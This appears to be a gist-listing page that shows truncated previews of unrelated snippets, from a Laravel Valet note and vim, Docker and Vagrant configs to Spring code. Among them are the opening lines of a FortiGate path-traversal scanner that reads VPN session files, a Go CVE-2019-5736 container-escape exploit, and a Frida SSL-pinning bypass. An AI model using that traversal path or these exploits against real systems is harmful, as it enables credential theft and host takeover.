Laravel Valet 은 PHP or Laravel 개발하는데에 거의 필수 툴이 되어가는 듯 합니다. Laravel Valet 제대로 설치하시고 정신건강을 보존하시길 바랍니다.
좀 보강할 내용은 댓글로 남겨주세요.
"Web development that doesn't hurt"
class Specification: | |
def __and__(self, other): | |
return And(self, other) | |
def __or__(self, other): | |
return Or(self, other) | |
def __xor__(self, other): | |
return Xor(self, other) |
" Don't try to be vi compatible | |
set nocompatible | |
" Helps force plugins to load correctly when it is turned back on below | |
filetype off | |
" TODO: Load plugins here (pathogen or vundle) | |
" Turn on syntax highlighting | |
syntax on |
import requests, binascii, optparse | |
from urlparse import urlparse | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
requests.packages.urllib3.disable_warnings() | |
import multiprocessing | |
def checkIP(ip): | |
try: | |
url = "https://"+ip+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" |
<!-- | |
filename: FeaturefulTableComp.vue | |
writer: code-machina | |
// IoC 컨테이너 용 설정 | |
depends on: { | |
'scss': [ | |
'@/static/scss/Table.scss', | |
// 생략 | |
], | |
'js' : [ |
version: '3.7' | |
services: | |
anguis1: | |
image: mongo:4.1 | |
hostname: anguis1 | |
container_name: anguis1 | |
networks: | |
- mongo-bridge | |
ports: |
BOX_IMAGE = "ubuntu/xenial64" | |
WORKER_COUNT = 0 # U can specify the number of workers. | |
MANAGER_IP_ADDRESS = "192.168.100.10" # Also, can chagne the subnet network | |
Vagrant.configure("2") do |config| | |
config.vm.box = BOX_IMAGE | |
config.vm.define "manager" do |subconfig| | |
subconfig.vm.box = BOX_IMAGE |
package main | |
// Implementation of CVE-2019-5736 | |
// Created with help from @singe, @_cablethief, and @feexd. | |
// This commit also helped a ton to understand the vuln | |
// https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d | |
import ( | |
"fmt" | |
"io/ioutil" | |
"os" |
/* | |
Android SSL Re-pinning frida script v0.2 030417-pier | |
$ adb push burpca-cert-der.crt /data/local/tmp/cert-der.crt | |
$ frida -U -f it.app.mobile -l frida-android-repinning.js --no-pause | |
https://techblog.mediaservice.net/2017/07/universal-android-ssl-pinning-bypass-with-frida/ | |
*/ | |
setTimeout(function(){ |
package com.gbkim.student.dal.repos; | |
import org.springframework.data.repository.CrudRepository; | |
import com.gbkim.student.dal.entities.Student; | |
// CrudRepository<Model_class_name, ids_type> (for example: CrudRepository<Student, Int>) | |
public interface StudentRepository extends CrudRepository<Student, Long> { | |
} |